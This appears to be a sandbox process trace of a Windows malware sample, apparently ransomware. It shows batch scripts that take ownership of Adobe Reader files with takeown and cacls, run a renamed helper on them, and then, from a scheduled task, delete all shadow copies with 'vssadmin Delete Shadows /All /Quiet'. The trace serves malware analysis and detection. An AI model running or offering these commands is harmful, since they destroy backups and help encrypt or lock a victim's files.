C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:1656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:1700
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:2044
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:1740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:1644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:2008
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F40AA1E0-BD81-4A5B-85EC-B0803A9B63C8} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]1⤵PID:960
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\3r13J0nw.bat"2⤵PID:1508
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2024
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648